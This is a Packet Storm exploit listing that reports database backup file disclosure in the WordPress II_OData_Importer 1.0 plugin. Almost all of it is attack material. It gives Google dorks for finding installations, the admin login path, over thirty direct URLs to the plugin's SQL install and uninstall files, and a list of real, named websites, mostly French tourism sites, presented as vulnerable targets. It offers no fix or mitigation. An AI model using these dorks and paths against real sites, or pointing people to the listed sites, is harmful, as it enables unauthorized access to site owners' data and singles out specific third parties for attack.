WordPress II_OData_Importer 1.0 Database Disclosure

2018-12-04T00:00:00
ID PACKETSTORM:150583
Type packetstorm
Reporter KingSkrupellos
Modified 2018-12-04T00:00:00

Description

                                        
                                            `#################################################################################################  
  
# Exploit Title : WordPress II_OData_Importer Plugins 1.0 Database Backup  
Disclosure  
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security  
Army  
# Date : 02/12/2018  
# Vendor Homepages : wordpress.org  
# Information about Plugin :  
+ themesinfo.com/wordpress-plugins/wordpress-ii_odata_importer-plugin-dt2m  
+ pluginu.com/II_OData_Importer  
# Tested On : Windows and Linux  
# Exploit Risk : Medium  
# Category : WebApps  
# Version Information : 1.0  
# Google Dorks :  
inurl:''/wp-content/plugins/II_OData_Importer/''  
Index of /wp-content/plugins/II_OData_Importer/  
# CxSecurity Exploit Link : cxsecurity.com/issue/WLB-2018110186  
# Exploit4Arab Exploit Link : exploitalert.com/view-details.html?id=31516  
# ExploitAlert Exploit Link : exploitalert.com/view-details.html?id=31516  
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access  
Controls ]  
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]  
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]  
  
#################################################################################################  
  
# Admin Panel Login Path :  
  
/wp-login.php  
  
# Exploits :  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_second_field.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/uninstall.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/a_insert_options_plugin.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/a_insert_options_plugin.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/alter_table_wp_postmeta_add_first_field.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/alter_table_wp_postmeta_second_field.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/alter_table_wp_posts.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iicommunes.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iicorropensystem.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iicrosssellingrules.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iicustommarqueblanche.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iidepartements.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iidistantcontents.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iifeed.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iifeed_comment.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iifeed_post_post.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iifeedfield.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iifeedfront.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iiglobalfield.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iiglobalmap.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iiglobaltotalmap.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iigroupfacets.sql  
  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iihtmltagtype.sql  
  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iiiconmapping.sql  
  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iimodule.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iiregions.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_iisubversioning.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/create_join_marqueblanche_maps.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/insert_iicommunes.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/insert_iidepartements.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/insert_iihtmltagtype.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/insert_iiiconmapping.sql  
  
/wp-content/plugins/II_OData_Importer/_assets/_sql/Install/insert_iiregions.sql  
  
  
#################################################################################################  
  
# Example Vulnerable Sites =>  
  
[+]  
tourisme-coutances.fr/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
albertville.fr/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
esternay-tourisme.fr/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
p6589.phpnet.org/laiguillonsurmer-tourisme2.fr/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
sudvendeetourisme.com/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
othagues.manche.io/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
fismes.reims-tourisme.com/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
argonne.fr/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
maraispoitevin-vendee.com/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
chalons-tourisme.com/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
paysducerdon-valleedelain.fr/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
maurienne-tourisme.com/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
ot-morillon.co.uk/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
[+]  
maraispoitevin-vendee.com/wp-content/plugins/II_OData_Importer/_assets/_sql/Desinstall/alter_table_wp_postmeta_first_field.sql  
  
#################################################################################################  
  
# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team  
  
#################################################################################################  
`